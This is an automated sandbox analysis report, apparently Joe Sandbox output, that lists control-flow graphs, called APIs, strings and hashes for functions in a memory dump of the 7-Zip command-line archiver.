                                                                                                                                                                                                                                                  control_flow_graph 3188 9983c8-99841d call 976570 call 9731c0 call 978624 3195 99841f-99844c call 9731c0 call 9786dc 3188->3195 3196 998482 3188->3196 3195->3196 3210 99844e-99847b call 9731c0 call 9786dc 3195->3210 3197 998485-998489 3196->3197 3199 998499-99849d 3197->3199 3200 99848b-998498 free 3197->3200 3202 9984ad-9984b1 3199->3202 3203 99849f-9984ac free 3199->3203 3200->3199 3205 9984bd-9984c0 3202->3205 3206 9984b3-9984b8 free 3202->3206 3203->3202 3208 9985ef-998607 call 973314 free 3205->3208 3209 9984c6-9984ee call 973208 call 998290 3205->3209 3206->3205 3217 99860a-998611 3208->3217 3222 99851b-998538 call 998290 3209->3222 3223 9984f0-998516 call 973314 free * 2 3209->3223 3210->3196 3224 99847d-998480 3210->3224 3229 99853a-998560 call 973314 free * 2 3222->3229 3230 998565-99857b call 998290 3222->3230 3223->3217 3224->3197 3229->3217 3235 99857d-9985a3 call 973314 free * 2 3230->3235 3236 9985a5-9985bb call 998290 3230->3236 3235->3217 3241 9985bd-9985e3 call 973314 free * 2 3236->3241 3242 9985e5-9985ea free 3236->3242 3241->3217 3242->3208
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                                                                                                                                                                                                  • API String ID: 1534225298-3804457719
                                                                                                                                                                                                                                                  • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                                  • Instruction ID: ad4d22b7ee5da3bc6741ecb92be75602cd37489b4f66d72dc7d538f0b993f7ed
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD518663218A4590DE20EF1AE85179F6720EBC67E4F845152BE5E477BACF3CC68AC700

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3245 99ab74-99aba4 3246 99abd3-99abf5 3245->3246 3247 99aba6 3245->3247 3249 99abfb 3246->3249 3250 99ae31-99ae78 call 9983c8 call 9731c0 call 99a7fc free 3246->3250 3248 99abaa-99abbc 3247->3248 3251 99abce-99abd1 3248->3251 3252 99abbe-99abc9 call 9994a8 free 3248->3252 3253 99ac02-99acba call 973208 call 973518 call 973208 * 2 3249->3253 3268 99ae7a 3250->3268 3269 99ae7f-99ae87 3250->3269 3251->3246 3251->3248 3252->3251 3277 99acbc-99acc1 call 973518 3253->3277 3278 99acc6-99accd 3253->3278 3271 99af7a-99af99 free 3268->3271 3272 99ae99-99aeca call 9731c0 call 99a9fc free 3269->3272 3273 99ae89-99ae94 call 97339c 3269->3273 3288 99aecc 3272->3288 3289 99aed1-99aeee call 9731c0 call 99a9fc 3272->3289 3273->3272 3277->3278 3281 99acd9-99ad35 call 999d98 free * 2 3278->3281 3282 99accf-99acd4 call 973518 3278->3282 3290 99ad51-99ad61 call 972130 3281->3290 3291 99ad37-99ad4c call 99a034 3281->3291 3282->3281 3288->3271 3301 99aef3-99af02 free 3289->3301 3299 99ad6c 3290->3299 3300 99ad63-99ad6a 3290->3300 3302 99addd-99adf2 call 972130 3291->3302 3304 99ad6f-99ad8b call 97b8f0 3299->3304 3300->3304 3305 99af04 3301->3305 3306 99af06-99af10 3301->3306 3311 99ae03 3302->3311 3312 99adf4-99ae01 call 999af0 3302->3312 3317 99adbd-99adc0 3304->3317 3318 99ad8d-99ad93 3304->3318 3305->3271 3309 99af18-99af1b 3306->3309 3310 99af12-99af16 3306->3310 3314 99af2a-99af2e 3309->3314 3315 99af1d-99af24 3309->3315 3310->3314 3319 99ae06-99ae2b call 97b8f0 call 9994a8 3311->3319 3312->3319 3321 99af30-99af36 3314->3321 3322 99af77 3314->3322 3315->3314 3320 99af26 3315->3320 3328 99adda 3317->3328 3329 99adc2-99add3 memmove 3317->3329 3324 99ada1-99adac 3318->3324 3325 99ad95-99ad9a free 3318->3325 3319->3250 3319->3253 3320->3314 3321->3322 3327 99af38 3321->3327 3322->3271 3330 99adae-99adb9 call 972130 3324->3330 3331 99add5-99add8 3324->3331 3325->3324 3333 99af3b-99af5a GetProcAddress 3327->3333 3328->3302 3329->3302 3330->3317 3331->3302 3336 99af5c-99af64 3333->3336 3337 99af66-99af6f 3333->3337 3336->3337 3342 99af73-99af75 3336->3342 3337->3333 3338 99af71 3337->3338 3338->3322 3342->3271
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099ABC9
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099ACF3
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099ACFE
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099AD95
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?), ref: 0099ADCB
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099AE70
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099AF7F
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994DB
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994E3
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 009994F0
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099951C
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 00999525
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099952D
                                                                                                                                                                                                                                                    • Part of subcall function 009994A8: free.MSVCRT ref: 0099953A
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099AEC2
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
                                                                                                                                                                                                                                                    • Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2
                                                                                                                                                                                                                                                    • Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AA95
                                                                                                                                                                                                                                                    • Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AAC5
                                                                                                                                                                                                                                                    • Part of subcall function 0099A9FC: free.MSVCRT ref: 0099AAD2
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 0099AEFA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0099AF4D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove$AddressProc
                                                                                                                                                                                                                                                  • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                                                                                                                                                                                                  • API String ID: 4053071709-2499791885
                                                                                                                                                                                                                                                  • Opcode ID: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
                                                                                                                                                                                                                                                  • Instruction ID: 3ba21a93eb612253f5ceafd5fd6620cda966fcf64ca80eeec0765d0ab1065282
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7B1AE67218AC196CF20EB29E4803AFB764F385788F508112EB8E47B65DF7CC959D742

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3343 9b1850-9b1886 EnterCriticalSection 3344 9b1888-9b188e call 9bb1c8 3343->3344 3345 9b18b1-9b18bb 3343->3345 3349 9b1893-9b18ac 3344->3349 3347 9b18bd call 9722e4 3345->3347 3348 9b18c2-9b18c4 3345->3348 3347->3348 3351 9b18ca-9b18d2 3348->3351 3352 9b1991-9b199e 3348->3352 3349->3345 3355 9b191a-9b192b 3351->3355 3356 9b18d4-9b18da 3351->3356 3353 9b1a4e-9b1a57 LeaveCriticalSection 3352->3353 3354 9b19a4-9b19a7 3352->3354 3357 9b1a59-9b1a62 3353->3357 3354->3353 3358 9b19ad-9b19b7 3354->3358 3359 9b196a-9b1974 3355->3359 3360 9b192d-9b193a call 972300 3355->3360 3356->3355 3361 9b18dc-9b18e2 3356->3361 3362 9b19b9-9b19d7 call 972300 fputs 3358->3362 3363 9b1a31-9b1a4c LeaveCriticalSection 3358->3363 3359->3363 3365 9b197a-9b1981 3359->3365 3360->3359 3374 9b193c-9b1965 fputs call 9726a0 call 972300 3360->3374 3366 9b18ed 3361->3366 3367 9b18e4-9b18eb 3361->3367 3377 9b19d9-9b19f0 fputs 3362->3377 3378 9b19f2-9b1a14 call 976618 call 972320 free 3362->3378 3363->3357 3365->3363 3370 9b1987-9b198c call 9722e4 3365->3370 3371 9b18f4-9b18fe 3366->3371 3367->3371 3370->3363 3371->3359 3372 9b1900-9b1913 fputs call 972300 3371->3372 3381 9b1918 3372->3381 3374->3359 3382 9b1a19-9b1a2c call 972300 call 9722e4 3377->3382 3378->3382 3381->3359 3382->3363
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 009B1877
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B190A
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B1A44
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B194D
                                                                                                                                                                                                                                                    • Part of subcall function 009726A0: fputs.MSVCRT ref: 009726C1
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B19CB
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B19EA
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B1A51
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B1A14
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                                                                                                                                                                                                  • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                                                                                                                                                                                                  • API String ID: 676172275-580504279
                                                                                                                                                                                                                                                  • Opcode ID: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                                                                  • Instruction ID: 16ef45a3c667e873258735b352086e56515eece5dd2666a0ae6d40cef92b7d32
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc88cfa74a48e71b2a3b1c96f7bb5f7f406cfe66436ff89ac4e6136bfa2ff71f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9515162345A81A2DB2D9F35EAB43ED7324F784BA0F848126DB6E47651CF38D4A4C300

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3392 9938e8-993977 call 991700 call 99373c memmove 3397 993979-99398d call 993864 free 3392->3397 3398 993992-9939a5 3392->3398 3405 993cb6-993cc9 3397->3405 3400 9939ab 3398->3400 3401 993a30-993a3d call 993864 3398->3401 3403 9939ae-9939c2 3400->3403 3411 993a3f-993a64 call 9902a0 _CxxThrowException 3401->3411 3412 993a65-993a77 3401->3412 3406 993a1d-993a25 3403->3406 3407 9939c4-9939ec call 9909e0 call 972130 3403->3407 3406->3403 3409 993a27-993a2b 3406->3409 3424 9939fb 3407->3424 3425 9939ee-9939f9 call 973314 3407->3425 3409->3401 3411->3412 3415 993a79-993a7c 3412->3415 3416 993ae1-993b27 call 9a5f5c call 9913e8 * 2 3412->3416 3420 993a7e-993aac call 973208 call 976e10 call 972130 3415->3420 3439 993c2a-993c46 free 3416->3439 3440 993b2d-993b30 3416->3440 3443 993abd 3420->3443 3444 993aae-993abb call 973314 3420->3444 3430 9939fe-993a16 call 97b8f0 free 3424->3430 3425->3430 3430->3406 3445 993c48 3439->3445 3446 993c76-993c84 free 3439->3446 3442 993b33-993b56 call 972130 3440->3442 3460 993b68 3442->3460 3461 993b58-993b66 call 973314 3442->3461 3449 993ac0-993adf call 97b8f0 free 3443->3449 3444->3449 3450 993c4c-993c5f 3445->3450 3451 993c88-993c95 3446->3451 3449->3416 3449->3420 3457 993c71-993c74 3450->3457 3458 993c61-993c6c free * 2 3450->3458 3452 993ca7-993caa 3451->3452 3453 993c97-993ca2 free * 2 3451->3453 3452->3451 3459 993cac-993cb4 free 3452->3459 3453->3452 3457->3446 3457->3450 3458->3457 3459->3405 3464 993b6b-993ba1 call 972130 3460->3464 3461->3464 3468 993bb3 3464->3468 3469 993ba3-993bb1 call 973314 3464->3469 3470 993bb6-993bc6 3468->3470 3469->3470 3472 993bc8-993be2 call 974338 3470->3472 3473 993be4-993bf2 3470->3473 3472->3473 3478 993bfa-993c29 call 9902a0 _CxxThrowException 3472->3478 3473->3442 3476 993bf8 3473->3476 3476->3439 3478->3439
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0099373C: free.MSVCRT ref: 009937FB
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 0099396F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00993986
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00993A11
                                                                                                                                                                                                                                                  • _CxxThrowException.MSVCRT ref: 00993A5F
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 00993AD3
                                                                                                                                                                                                                                                    • Part of subcall function 00993864: free.MSVCRT ref: 00993877
                                                                                                                                                                                                                                                    • Part of subcall function 00993864: free.MSVCRT ref: 00993892
                                                                                                                                                                                                                                                    • Part of subcall function 00993864: free.MSVCRT ref: 0099389B
                                                                                                                                                                                                                                                    • Part of subcall function 00993864: free.MSVCRT ref: 009938C6
                                                                                                                                                                                                                                                    • Part of subcall function 00993864: free.MSVCRT ref: 009938CE
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowmemmove
                                                                                                                                                                                                                                                  • String ID: Cannot find archive$Duplicate archive path:
                                                                                                                                                                                                                                                  • API String ID: 3934437811-2067063536
                                                                                                                                                                                                                                                  • Opcode ID: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                                                                                                                                                                                                                                  • Instruction ID: 2941b07c8010c551baf9ea342680a204e57fad4409a7f61fbe370018e5d971d7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15ebe3c882bc9668213b7dd33c6c16c3777921ba145b699e337e3eca45f7d6ba
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EA17473325A8582CE20EF1AE49065EB365F7C5B90F548512EF9E07B29DF38C945CB10

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 3481 9a42a2-9a42c0 3483 9a42c2-9a42d0 3481->3483 3484 9a42d5-9a42d8 3481->3484 3483->3484 3485 9a42da 3484->3485 3486 9a42e0-9a43ab call 9940c4 memmove call 973404 call 9a3a20 3484->3486 3485->3486 3494 9a45d8-9a468f call 973404 * 3 free * 2 call 99419c 3486->3494 3495 9a43b1-9a43b3 3486->3495 3534 9a4698-9a46a0 3494->3534 3535 9a4691-9a4697 3494->3535 3496 9a43b9-9a43d7 call 99c684 3495->3496 3497 9a46c5-9a46f4 free * 2 call 99419c 3495->3497 3507 9a4728-9a4757 free * 2 call 99419c 3496->3507 3508 9a43dd-9a43ef call 972130 3496->3508 3505 9a46fd-9a4705 3497->3505 3506 9a46f6-9a46fc 3497->3506 3511 9a470e-9a4719 3505->3511 3512 9a4707-9a470d 3505->3512 3506->3505 3526 9a4759-9a475f 3507->3526 3527 9a4760-9a4768 3507->3527 3522 9a4403 3508->3522 3523 9a43f1-9a4401 call 99caac 3508->3523 3518 9a471b 3511->3518 3519 9a4721-9a4723 3511->3519 3512->3511 3518->3519 3525 9a47fe-9a4811 3519->3525 3532 9a4406-9a4441 call 97b8f0 free * 2 call 99419c 3522->3532 3523->3532 3526->3527 3529 9a476a-9a4770 3527->3529 3530 9a4771-9a477c 3527->3530 3529->3530 3536 9a477e 3530->3536 3537 9a4784-9a4786 3530->3537 3551 9a444a-9a4452 3532->3551 3552 9a4443-9a4449 3532->3552 3541 9a46a9-9a46b4 3534->3541 3542 9a46a2-9a46a8 3534->3542 3535->3534 3536->3537 3537->3525 3543 9a47f2-9a47fb 3537->3543 3541->3543 3546 9a46ba-9a46c0 3541->3546 3542->3541 3543->3525 3546->3543 3553 9a445b-9a446c 3551->3553 3554 9a4454-9a445a 3551->3554 3552->3551 3556 9a3fa9-9a4033 memmove 3553->3556 3557 9a4472-9a4478 3553->3557 3554->3553 3560 9a4054-9a4072 memmove 3556->3560 3561 9a4035-9a4052 memmove 3556->3561 3557->3556 3560->3543 3563 9a4078-9a40e9 memmove call 99c0fc call 973404 * 2 call 9a3d58 3560->3563 3561->3563 3573 9a40ee-9a40f2 3563->3573 3574 9a40f8-9a410a call 972130 3573->3574 3575 9a447d-9a4480 3573->3575 3582 9a411e 3574->3582 3583 9a410c-9a411c call 99caac 3574->3583 3576 9a450c-9a451b call 99419c 3575->3576 3577 9a4486-9a450b call 973404 * 3 3575->3577 3576->3525 3577->3576 3587 9a4121-9a413a call 97b8f0 call 99419c 3582->3587 3583->3587
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-3916222277
                                                                                                                                                                                                                                                  • Opcode ID: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                                                                                                                                                                                                                                  • Instruction ID: 49dea9e6d21ac827adca9323e4c5c61ad0c50e598a5cedfd3443e2d693f05e89
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3aa71f5739002ec70ae4d321f5bd210f1a65664215592b72844cec7c5cd73cb9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29D13B37209AC496CB21DF29E0902AEBB60F7D6B84F545016EB8E43B29DF7CC549CB50
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$memmove
                                                                                                                                                                                                                                                  • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                                                                                                                                                                                                                                  • API String ID: 2879976980-73314117
                                                                                                                                                                                                                                                  • Opcode ID: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                                  • Instruction ID: 4e6ef23917e1304d46eb1e41155942788ff931d5da0920efe644f5382affbf3f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86a18b28d52ae06bcd17bab5c6f39fa0c0b3e485010e9e2949c622b07ec98686
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E417B32601A4196DF30DF29F89075EB365F784788F40012ADB8E83B55EF78D945CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B1CF9
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: memset.MSVCRT ref: 009BB20D
                                                                                                                                                                                                                                                    • Part of subcall function 009BB1C8: fputs.MSVCRT ref: 009BB232
                                                                                                                                                                                                                                                    • Part of subcall function 00972300: fputc.MSVCRT ref: 00972311
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B1DEE
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B1F07
                                                                                                                                                                                                                                                  • fputs.MSVCRT ref: 009B1F5C
                                                                                                                                                                                                                                                    • Part of subcall function 009B171C: fputs.MSVCRT ref: 009B1744
                                                                                                                                                                                                                                                    • Part of subcall function 009B171C: fputs.MSVCRT ref: 009B1758
                                                                                                                                                                                                                                                    • Part of subcall function 009B171C: free.MSVCRT ref: 009B176B
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: FormatMessageW.KERNEL32 ref: 00976676
                                                                                                                                                                                                                                                    • Part of subcall function 00976618: LocalFree.KERNEL32 ref: 00976698
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 0097237E
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
                                                                                                                                                                                                                                                    • Part of subcall function 00972320: free.MSVCRT ref: 009723C4
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009B1F86
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs$free$FormatFreeLocalMessagefputcmemset
                                                                                                                                                                                                                                                  • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                                  • API String ID: 2553544393-24972044
                                                                                                                                                                                                                                                  • Opcode ID: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                                                                  • Instruction ID: dc5ad51e3dfababc4c3c1b95989ba66db1f508ee1f29a95a3177e6d61b6323a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8fab687c64268b82cb3662449b661246a7da8ff8f53bbd6509775a5cb297495
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFA17F777146C49ACA39EF72D6A03EE7725F784B90F888126DB5E0B611DF68D8A4C310
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$ExceptionThrowfputs
